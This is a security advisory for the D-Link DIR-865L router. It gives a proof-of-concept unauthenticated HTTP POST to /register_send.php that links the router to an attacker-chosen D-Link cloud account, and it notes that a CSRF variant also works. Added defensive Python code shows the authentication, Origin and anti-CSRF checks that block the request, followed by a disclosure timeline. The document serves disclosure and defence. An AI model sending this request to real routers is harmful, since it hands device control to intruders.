ISE SOHO Vulnerability Catalog Published - Independent Security ...
♦ Additional information for vendors regarding immediate and long-term fixes for these issues can be found here: http://www.securityevaluators.com/content/casestudies/routers/#recommendationsVendors
Solution
♦ There currently is not a solution to this problem.
♦ As a workaround, restrict access to WAN services.
Proof of Concept Exploit
The following HTTP POST will link the affected DIR-865L router to a D-Link cloud account. This attack could also be carried out via CSRF if the attacker does not have access to the web management interface.
D-Link Cloud Account Linking
* Make unauthenticated request to the router
POST /register_send.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 91
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

act=signin&lang=en&outemail=ACCOUNT_HERE&passwd=ACCOUNT_PASSWORD&mydlink_cookie=
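The checks a router's /register_send.php handler would need in order to refuse both the unauthenticated POST above and the CSRF variant the advisory mentions, as an added defender-side example that is not code from the ISE catalog or from D-Link firmware. The in-memory session store, the csrf_token form field and the handler names are hypothetical; the Host and form body are taken from the request above.

```python
import hmac
import secrets
from urllib.parse import parse_qs

ROUTER_ORIGIN = "http://192.168.0.1"  # LAN management address used in the advisory
SESSIONS = {}  # hypothetical in-memory store: session id -> anti-CSRF token

def create_session():
    """Issue a session id plus a per-session anti-CSRF token after a real admin login."""
    sid, token = secrets.token_urlsafe(16), secrets.token_urlsafe(16)
    SESSIONS[sid] = token
    return sid, token

def handle_register_send(headers, cookies, body):
    """Decide a POST to /register_send.php and return (HTTP status, reason).
    Each check alone blocks the advisory's request: (1) an authenticated management
    session must exist, (2) the browser-supplied Origin (or Referer) must be the
    router itself, (3) the form must carry that session's anti-CSRF token."""
    sid = cookies.get("session")
    if sid not in SESSIONS:
        return 401, "no authenticated management session"
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != ROUTER_ORIGIN and not origin.startswith(ROUTER_ORIGIN + "/"):
        return 403, "cross-site request: Origin/Referer is not the router"
    form = parse_qs(body, keep_blank_values=True)
    token = form.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), SESSIONS[sid].encode()):
        return 403, "missing or wrong anti-CSRF token"
    if form.get("act", [""])[0] != "signin":
        return 400, "unsupported action"
    return 200, "cloud account linked for " + form.get("outemail", [""])[0]

# Form body from the advisory, reused here as constructed test input.
ADVISORY_BODY = "act=signin&lang=en&outemail=ACCOUNT_HERE&passwd=ACCOUNT_PASSWORD&mydlink_cookie="

def demo():
    """Status codes for: the advisory's unauthenticated POST; a CSRF POST riding a
    logged-in browser's cookie from another site; a same-origin POST without the
    token; a legitimate same-origin POST carrying the token."""
    sid, token = create_session()
    return (
        handle_register_send({}, {}, ADVISORY_BODY)[0],
        handle_register_send({"Origin": "http://other-site.example"}, {"session": sid}, ADVISORY_BODY)[0],
        handle_register_send({"Origin": ROUTER_ORIGIN}, {"session": sid}, ADVISORY_BODY)[0],
        handle_register_send({"Origin": ROUTER_ORIGIN}, {"session": sid},
                             ADVISORY_BODY + "&csrf_token=" + token)[0],
    )

if __name__ == "__main__":
    print(demo())  # (401, 403, 403, 200)
```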
Disclosure Timeline
♦ 3/2013 - Notified D-Link. No response.
♦ 4/3/2013 - Notified D-Link requesting a follow-up.
♦ 7/26/2013 - Public Disclosure
References
♦ Advisory/Video: http://infosec42.blogspot.com
♦ http://securityevaluators.com/content/case-studies/
Credit
♦ Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
♦ Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators